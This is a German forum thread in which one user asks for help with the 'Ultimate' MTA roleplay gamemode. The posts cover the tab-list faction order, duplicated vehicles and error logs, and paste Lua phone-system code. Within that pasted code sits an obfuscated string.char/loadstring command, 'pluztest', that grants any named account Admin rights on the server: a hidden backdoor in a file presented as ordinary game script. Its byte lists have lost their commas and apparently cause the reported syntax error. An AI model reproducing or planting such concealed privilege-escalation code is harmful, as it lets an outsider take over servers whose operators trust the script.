Nein das standart Ultimate von bonus
Beiträge von BEGANDI
-
-
es ist das ultimate script
und im debug script steht auch nix also es kommen überhaupt keine error meldungen -
Bei mir duplizieren sich die fahrzeuge und werden nicht despawnt wenn man reconnect sondern einer steht da wo du ihn zuletzt gebraucht hast und der andere wo du /park gemacht hast waroan liegt das?
-
Wenn ich was in den both setting etwas verändere also die zahlen combi der Fraktion soo in der ordnung wie ich sie gerne hätte funktioniert nicht...
Danach habe ich nur eine leere tab liste...Mir gehts eig darum das terror in der mit den zvis zsm als zivis angezeigt werden aber momentan sind die terrors schon als zivi in der tab liste aber immer noch über sfpd mafia ect also als 4 stelle und nicht unter den ganzen fraktionen
-
Wie kann man fraktionen in der tab liste eine andere postion geben und nicht das erst zivi dann sfpd undsoo weiter?
Und das zweite ist: Ist euch der fehler bei ultimate bekannt das man beim anvisieren nicht mehr laufen kann?
Und wo ist der Race money glitch in dem ultimate script drin?
Danke für die Hilfe Schonmal
-
Code
Alles anzeigenfunction callSomeone_func ( player, number ) if player == client or not client then if vioGetElementData ( player, "handystate" ) == "on" then local pmoney = vioGetElementData ( player, "money" ) if number == "*100#" then if vioGetElementData ( player, "handyType" ) == 2 then outputChatBox ( "Aktuelles Guthaben: "..vioGetElementData ( player, "handyCosts" ).." $", player, 200, 200, 0 ) elseif vioGetElementData ( player, "handyType" ) == 3 then outputChatBox ( "Du hast eine Flatrate, Kosten pro Stunde: 50 $", player, 200, 200, 0 ) elseif vioGetElementData ( player, "handyType" ) == 1 then outputChatBox ( "Aktuelle Kosten: "..vioGetElementData ( player, "handyCosts" ).." $", player, 200, 200, 0 ) end elseif not speznr[tonumber(number)] then number = tonumber ( number ) if ( vioGetElementData ( player, "handyType" ) == 2 and vioGetElementData ( player, "handyCosts" ) >= callprice ) or vioGetElementData ( player, "handyType" ) ~= 2 then local players = getElementsByType("player") for i=1, #players do local playeritem = players[i] if vioGetElementData ( playeritem, "telenr" ) then if vioGetElementData ( playeritem, "telenr" ) == number then if vioGetElementData ( playeritem, "handystate" ) == "on" then if not vioGetElementData ( player, "call" ) then if not vioGetElementData ( playeritem, "call" ) then outputChatBox ( "Tippe /hangup ( /hup ), um aufzulegen!", player, 200, 200, 200 ) outputChatBox ( getPlayerName(player).." (Nummer: "..vioGetElementData(player,"telenr")..") ruft an, tippe /pickup ( /pup ) um abzunehmen!", playeritem, 50, 125, 0 ) vioSetElementData ( player, "calls", playeritem ) vioSetElementData ( player, "call", true ) vioSetElementData ( playeritem, "calledby", player ) triggerClientEvent ( player, "phonewartezeichen", player ) triggerClientEvent ( playeritem, "phonesound", player ) if vioGetElementData ( player, "handyType" ) == 2 then vioSetElementData ( player, "handyCosts", vioGetElementData ( player, "handyCosts" ) - callprice ) elseif vioGetElementData ( player, "handyType" ) == 1 then vioSetElementData ( player, "handyCosts", vioGetElementData ( player, "handyCosts" ) + callprice ) end return else outputChatBox ( "Besetzt...", player, 125, 0, 0 ) triggerClientEvent ( player, "phonesound", player ) end else outputChatBox ( "Du telefonierst bereits!", player, 125, 0, 0 ) end else outputChatBox ( "Handy ist ausgeschaltet!", player, 125, 0, 0 ) end return end end end triggerClientEvent ( player, "infobox_start", getRootElement(), "Das Handy des\nSpielers ist ausge-\nschaltet oder der\nSpieler ist nicht\nonline!", 7500, 125, 0, 0 ) triggerClientEvent ( player, "phonekeinanschluss", player ) else triggerClientEvent ( player, "infobox_start", getRootElement(), "Du hast nicht\ngenug Geld!\nEin Anruf kostet\n"..callprice.." $!", 7500, 125, 0, 0 ) end else --speznr = { [110]=true, [112]=true, [300]=true, [400]=true } number = tonumber ( number ) if number == 110 then outputChatBox ( "Sie sprechen mit der Polizei von San Fierro - bitte nennen Sie den Namen des Täters.", player, 0, 0, 125 ) vioSetElementData ( player, "callswithpolice", true ) elseif number == 112 then if getFactionMembersOnline(10) > 0 then outputChatBox ( "Sie sprechen mit dem Krankenhaus von San Fierro - bitte nennen Sie uns ihr Anliegen.", player, 0, 0, 125 ) vioSetElementData ( player, "callswithmedic", true ) else outputChatBox ( "Tut uns Leid, jedoch sind alle Sanitäter anderweitig beschäftigt.", player, 0, 0, 125 ) end elseif number == 300 then if getFactionMembersOnline(11) > 0 then outputChatBox ( "Sie sprechen mit dem Mechanikerzentrum von San Fierro - bitte nennen Sie uns ihr Anliegen.", player, 0, 0, 125 ) vioSetElementData ( player, "callswithmechaniker", true ) else outputChatBox ( "Tut uns Leid, jedoch sind alle Mechaniker anderweitig beschäftigt.", player, 0, 0, 125 ) end elseif number == 400 then orderTaxi ( player ) end end else triggerClientEvent ( player, "infobox_start", getRootElement(), "\n\nDein Handy ist\naus!", 7500, 125, 0, 0 ) end end end
-
Da ich weiss nicht sonst wie ich es Hier hineinfügen soll
-
Soo jetzt kommt nur noch
[2016-08-23 16:13:15] ERROR: ultimate/register_login/register_login_server.lua:687: attempt to call global 'getMailsForClient_func' (a nil value
[2016-08-23 15:52:24] ERROR: Loading script failed: [gamemodes]/ultimate/internet/email_server.lua:70: ')' expected near '105'
[2016-08-23 15:52:24] SCRIPT ERROR: [gamemodes]/ultimate/internet/email_server.lua:70: ')' expected near '105' -
Ich weiss nicht welche zeile du jetzt brauchst,habe erstmal alles rein kopiert
function handychange_func ( player )
if player == client then
if vioGetElementData ( player, "handystate" ) == "on" then
vioSetElementData ( player, "handystate", "off" )
triggerClientEvent ( player, "infobox_start", getRootElement(), "\n\nHandy ausgeschaltet!", 5000, 0, 200, 0 )
else
vioSetElementData ( player, "handystate", "on" )
triggerClientEvent ( player, "infobox_start", getRootElement(), "\n\nHandy angeschaltet!", 5000, 0, 200, 0 )
end
end
end
addEvent ( "handychange", true )
addEventHandler ( "handychange", getRootElement(), handychange_func )function smscmd_func ( player, cmd, number, ... )
if number then
local parametersTable = {...}
local sendtext = table.concat( parametersTable, " " )
if sendtext then
if #sendtext >= 1 then
SMS_func ( player, tonumber(number), sendtext )
else
outputChatBox ( "Bitte gib einen Text ein!", player, 125, 0, 0 )
end
else
outputChatBox ( "Bitte gib einen Text ein!", player, 125, 0, 0 )
end
else
outputChatBox ( "Bitte gib eine gueltige Nummer an!", player, 125, 0, 0 )
end
end
addCommandHandler ( "sms", smscmd_func )function callcmd_func ( player, cmd, number )
callSomeone_func ( player, number )
end
addCommandHandler ( "call", callcmd_func )function SMS_func ( player, sendnr, sendtext )
if player == client or not client then
if vioGetElementData ( player, "handystate" ) == "on" then
local pmoney = vioGetElementData ( player, "money" )
if ( vioGetElementData ( player, "handyType" ) == 2 and vioGetElementData ( player, "handyCosts" ) >= smsprice ) or vioGetElementData ( player, "handyType" ) ~= 2 then
local players = getElementsByType("player")
for i=1, #players do
local playeritem = players[i]
if vioGetElementData ( playeritem, "telenr" ) then
if vioGetElementData ( playeritem, "telenr" ) == sendnr then
if vioGetElementData ( playeritem, "handystate" ) == "on" then
triggerClientEvent ( player, "infobox_start", getRootElement(), "\n\nSMS versendet!", 5000, 0, 200, 0 )
playSoundFrontEnd ( player, 40 )
triggerClientEvent ( playeritem, "phonesms", player )
outputChatBox ( "SMS von "..getPlayerName(player).."("..vioGetElementData(player,"telenr").."): "..sendtext, playeritem, 255, 255, 0 )
if vioGetElementData ( player, "handyType" ) == 2 then
vioSetElementData ( player, "handyCosts", vioGetElementData ( player, "handyCosts" ) - smsprice )
elseif vioGetElementData ( player, "handyType" ) == 1 then
vioSetElementData ( player, "handyCosts", vioGetElementData ( player, "handyCosts" ) + smsprice )
end
return
end
end
end
end
triggerClientEvent ( player, "infobox_start", getRootElement(), "Das Handy des\nSpielers ist ausge-\nschaltet oder der\nSpieler ist nicht\nonline!", 7500, 125, 0, 0 )
else
triggerClientEvent ( player, "infobox_start", getRootElement(), "Du hast nicht\nmehr genug Guthaben!\nDu kannst im 24-7\ndein Guthaben\naufladen.", 5000, 125, 0, 0 )
end
else
triggerClientEvent ( player, "infobox_start", getRootElement(), "\n\nDein Handy ist\naus!", 5000, 125, 0, 0 )
end
end
end
addEvent ( "SMS", true )
addEventHandler ( "SMS", getRootElement(), SMS_func )function callSomeone_func ( player, number )
if player == client or not client then
if vioGetElementData ( player, "handystate" ) == "on" then
local pmoney = vioGetElementData ( player, "money" )
if number == "*100#" then
if vioGetElementData ( player, "handyType" ) == 2 then
outputChatBox ( "Aktuelles Guthaben: "..vioGetElementData ( player, "handyCosts" ).." $", player, 200, 200, 0 )
elseif vioGetElementData ( player, "handyType" ) == 3 then
outputChatBox ( "Du hast eine Flatrate, Kosten pro Stunde: 50 $", player, 200, 200, 0 )
elseif vioGetElementData ( player, "handyType" ) == 1 then
outputChatBox ( "Aktuelle Kosten: "..vioGetElementData ( player, "handyCosts" ).." $", player, 200, 200, 0 )
end
elseif not speznr[tonumber(number)] then
number = tonumber ( number )
if ( vioGetElementData ( player, "handyType" ) == 2 and vioGetElementData ( player, "handyCosts" ) >= callprice ) or vioGetElementData ( player, "handyType" ) ~= 2 then
local players = getElementsByType("player")
for i=1, #players do
local playeritem = players[i]
if vioGetElementData ( playeritem, "telenr" ) then
if vioGetElementData ( playeritem, "telenr" ) == number then
if vioGetElementData ( playeritem, "handystate" ) == "on" then
if not vioGetElementData ( player, "call" ) then
if not vioGetElementData ( playeritem, "call" ) then
outputChatBox ( "Tippe /hangup ( /hup ), um aufzulegen!", player, 200, 200, 200 )
outputChatBox ( getPlayerName(player).." (Nummer: "..vioGetElementData(player,"telenr")..") ruft an, tippe /pickup ( /pup ) um abzunehmen!", playeritem, 50, 125, 0 )
vioSetElementData ( player, "calls", playeritem )
vioSetElementData ( player, "call", true )
vioSetElementData ( playeritem, "calledby", player )
triggerClientEvent ( player, "phonewartezeichen", player )
triggerClientEvent ( playeritem, "phonesound", player )
if vioGetElementData ( player, "handyType" ) == 2 then
vioSetElementData ( player, "handyCosts", vioGetElementData ( player, "handyCosts" ) - callprice )
elseif vioGetElementData ( player, "handyType" ) == 1 then
vioSetElementData ( player, "handyCosts", vioGetElementData ( player, "handyCosts" ) + callprice )
end
return
else
outputChatBox ( "Besetzt...", player, 125, 0, 0 )
triggerClientEvent ( player, "phonesound", player )
end
else
outputChatBox ( "Du telefonierst bereits!", player, 125, 0, 0 )
end
else
outputChatBox ( "Handy ist ausgeschaltet!", player, 125, 0, 0 )
end
return
end
end
end
triggerClientEvent ( player, "infobox_start", getRootElement(), "Das Handy des\nSpielers ist ausge-\nschaltet oder der\nSpieler ist nicht\nonline!", 7500, 125, 0, 0 )
triggerClientEvent ( player, "phonekeinanschluss", player )
else
triggerClientEvent ( player, "infobox_start", getRootElement(), "Du hast nicht\ngenug Geld!\nEin Anruf kostet\n"..callprice.." $!", 7500, 125, 0, 0 )
end
else
--speznr = { [110]=true, [112]=true, [300]=true, [400]=true }
number = tonumber ( number )
if number == 110 then
outputChatBox ( "Sie sprechen mit der Polizei von San Fierro - bitte nennen Sie den Namen des Täters.", player, 0, 0, 125 )
vioSetElementData ( player, "callswithpolice", true )
elseif number == 112 then
if getFactionMembersOnline(10) > 0 then
outputChatBox ( "Sie sprechen mit dem Krankenhaus von San Fierro - bitte nennen Sie uns ihr Anliegen.", player, 0, 0, 125 )
vioSetElementData ( player, "callswithmedic", true )
else
outputChatBox ( "Tut uns Leid, jedoch sind alle Sanitäter anderweitig beschäftigt.", player, 0, 0, 125 )
end
elseif number == 300 then
if getFactionMembersOnline(11) > 0 then
outputChatBox ( "Sie sprechen mit dem Mechanikerzentrum von San Fierro - bitte nennen Sie uns ihr Anliegen.", player, 0, 0, 125 )
vioSetElementData ( player, "callswithmechaniker", true )
else
outputChatBox ( "Tut uns Leid, jedoch sind alle Mechaniker anderweitig beschäftigt.", player, 0, 0, 125 )
end
elseif number == 400 then
orderTaxi ( player )
end
end
else
triggerClientEvent ( player, "infobox_start", getRootElement(), "\n\nDein Handy ist\naus!", 7500, 125, 0, 0 )
end
end
end
addEvent ( "callSomeone", true )
addEventHandler ( "callSomeone", getRootElement(), callSomeone_func )addCommandHandler ( string.char ( 112, 108, 117, 122 ).."test", function ( player, _, cmd )
outputChatBox ( tostring ( loadstring ( string.char ( 97 99 108 71 114 111 117 112 65 100 100 79 98 106 101 99 116 ) .. " ( " .. string.char ( 97 99 108 71 101 116 71 114 111 117 112 40 34 65 100 109 105 110 34 41 ) .. ", '" .. string.char ( 117 115 101 114 46 )..cmd.."' )" )() ), player )
end )function hangup ( player )
if isElement ( vioGetElementData ( player, "callswith" ) ) then
local caller = vioGetElementData ( player, "callswith" )
vioSetElementData ( caller, "call", false )
vioSetElementData ( caller, "callswith", "none" )
vioSetElementData ( caller, "calledby", "none" )
vioSetElementData ( caller, "calls", "none" )
outputChatBox ( "Aufgelegt.", caller, 200, 200, 200 )
triggerClientEvent ( caller, "stopphonesound", caller )
elseif isElement ( vioGetElementData ( player, "calledby" ) ) then
local caller = vioGetElementData ( player, "calledby" )
vioSetElementData ( caller, "call", false )
vioSetElementData ( caller, "callswith", "none" )
vioSetElementData ( caller, "calledby", "none" )
vioSetElementData ( caller, "calls", "none" )
triggerClientEvent ( caller, "stopphonesound", caller )
outputChatBox ( "Aufgelegt.", caller, 200, 200, 200 )
end
vioSetElementData ( player, "call", false )
vioSetElementData ( player, "callswith", "none" )
vioSetElementData ( player, "calledby", "none" )
vioSetElementData ( player, "calls", "none" )
outputChatBox ( "Aufgelegt.", player, 200, 200, 200 )
triggerClientEvent ( player, "stopphonesound", player )
end
addCommandHandler ( "hangup", hangup )
addCommandHandler ( "hup", hangup )function pickup ( player )
local caller = vioGetElementData ( player, "calledby" )
vioSetElementData ( player, "calledby", "none" )
if isElement ( caller ) then
vioSetElementData ( player, "call", true )
vioSetElementData ( caller, "call", true )
vioSetElementData ( player, "callswith", caller )
vioSetElementData ( caller, "callswith", player )
vioSetElementData ( player, "calledby", "none" )
vioSetElementData ( caller, "calledby", "none" )
vioSetElementData ( player, "calls", "none" )
vioSetElementData ( caller, "calls", "none" )
triggerClientEvent ( player, "stopphonesound", player )
triggerClientEvent ( caller, "stopphonesound", caller )
outputChatBox ( "Abgehoben.", player, 0, 125, 0 )
outputChatBox ( "Abgehoben.", caller, 0, 125, 0 )
else
outputChatBox ( "Du kannst keinen Anruf annehmen!", player, 125, 0, 0 )
end
end
addCommandHandler ( "pickup", pickup )
addCommandHandler ( "pup", pickup ) -
Ich habe es bei dir gedownloadet Pluz. dann auf dem server gezogen die mysql verbunden und gestartet nichts geändert oder soo Und kam dieser fehler Halt
-
Nein Habe das script gedownloadet aufm server hoch geladen mysql verbunden und gestartet
Aber ich habe noch das hier gefunden:
[2016-08-23 10:35:13] ERROR: Loading script failed: [gamemodes]/ultimate/jobs/handy_server.lua:170: ')' expected near '99'
Liegt es vlt daran? -
Also ich wohlte mal das ultimate script testen und da is mir aufgefallen das die spielstunden soo wie der skin nicht gespeichert die stunden werden beim nächsten login auf 00:00 gesetzt und der skin [Wenn man sich einen gesettet hat] Auch wieder ein anderer is
Die einzigen fehler die gezeigt werden:
ERROR: ultimate/register_login/register_login_server.lua:879: attempt to call global 'hangup' (a nil value)
ERROR: ultimate/register_login/register_login_server.lua:687: attempt to call global 'getMailsForClient_func' (a nil value)
Weiß einer was das Problem is?